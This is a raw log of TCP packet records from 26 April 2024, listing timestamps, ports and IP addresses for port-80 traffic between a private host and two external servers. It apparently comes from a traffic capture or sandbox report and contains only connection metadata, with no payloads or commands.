Apr 26, 2024 10:27:04.690529108 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690587997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690602064 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690649033 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690690994 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690728903 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690768003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.690783024 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690819979 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.690969944 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691013098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691077948 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691112995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691150904 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691157103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691195965 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691251993 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691291094 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691304922 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691329002 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691335917 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691350937 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691370964 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691391945 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691411972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691456079 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691457987 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691488028 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691497087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691529036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691549063 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691590071 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691607952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.691662073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691915989 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.691977978 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.805815935 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.806082010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.806344032 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.806350946 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.806618929 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.806706905 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.806787968 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.806896925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.806952000 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.807313919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.807411909 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.807451010 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.807513952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.807620049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.807670116 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.807979107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.808197021 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.808320045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.808362007 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.808393002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.808422089 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.808569908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.809281111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.809454918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.809505939 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.809644938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.809695959 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.810079098 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.810142040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.810197115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.810235023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.810246944 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.810276985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.810295105 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.810350895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.810420990 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.810473919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.810481071 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.810529947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.810601950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.811285019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.811517000 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.811573982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.811707973 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.811755896 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.811758995 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.811795950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.811954975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.812006950 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.812123060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.812175035 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.812355995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.812458038 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.812757969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.812810898 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.812855005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.812901974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.813327074 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.813510895 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.813611031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.813662052 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.813683987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.813733101 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.813920975 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.815568924 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.815666914 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.815717936 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.815802097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.815841913 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.815856934 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.815924883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816030025 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816067934 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816082954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.816122055 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.816122055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816159964 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816196918 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816247940 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.816267967 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816306114 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816318989 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.816407919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816478014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816518068 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816565990 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.816569090 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816596985 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.816642046 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816680908 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816692114 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.816719055 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816788912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816838980 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.816859961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816899061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.816910028 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.817002058 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.817126989 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.817164898 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.817182064 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.817203045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.817215919 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.817243099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.817403078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.817451954 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.817538023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.817588091 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.817879915 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.817940950 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.818053961 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.818106890 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.818140984 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.818181992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.818188906 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.818253040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.818289995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.818334103 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.818373919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 26, 2024 10:27:04.818427086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 26, 2024 10:27:04.920888901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.920928955 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.920964956 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.920980930 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.921010971 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.921020031 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.921344995 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.921396017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.922024965 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.922080994 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.922457933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.922512054 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.922873974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.922923088 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.923367977 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.923427105 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.924226046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.924276114 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.924485922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.924532890 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925273895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925293922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925312042 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925323009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925328970 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925347090 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925349951 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925355911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925378084 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925384998 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925399065 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925401926 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925420046 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925430059 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925437927 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925441027 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925458908 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925476074 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925479889 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925493956 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925502062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925512075 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925529003 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925532103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925546885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925563097 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925565958 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925575972 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925584078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925596952 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925601959 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925607920 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925617933 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925626993 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925642014 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925643921 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925659895 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925668955 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925678015 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925678968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925694942 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925694942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925714016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925719976 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925733089 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925743103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925750971 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925754070 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925780058 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925789118 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925810099 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.925853968 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.925996065 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926039934 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.926187992 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926204920 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926233053 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.926244974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.926366091 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926383972 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926402092 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926412106 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.926426888 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.926449060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.926558018 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926575899 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926620960 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.926739931 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926758051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926789045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.926819086 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.926923037 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926942110 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926958084 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.926970959 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.926994085 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.927000999 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.927072048 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.927090883 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.927119017 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.927129984 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.927259922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.927285910 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.927309036 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.927321911 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.927438974 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.927459002 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.927485943 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.927498102 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.927582026 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.927639008 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.927819967 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.927870035 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.927953005 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.927972078 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.928002119 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.928020954 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.928258896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.928308010 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.928436041 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.928453922 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.928469896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.928483009 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.928488016 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.928497076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.928517103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.928527117 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.928576946 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.928596020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.928612947 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.928642035 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.928664923 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.928854942 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.928903103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929002047 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929019928 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929045916 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929068089 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929193020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929210901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929228067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929239988 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929253101 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929368973 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929371119 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929390907 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929408073 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929416895 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929426908 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929449081 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929560900 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929579020 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929594994 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929609060 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929614067 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929629087 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929639101 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929657936 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929820061 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929838896 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.929866076 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929886103 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.929991961 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.930042028 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.930193901 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.930242062 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.930358887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.930377007 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.930404902 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.930416107 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.930550098 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.930569887 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.930598974 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.930609941 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.930726051 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 26, 2024 10:27:04.930803061 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 26, 2024 10:27:04.930879116 CEST	80	49733	185.172.128.76	192.168.2.4
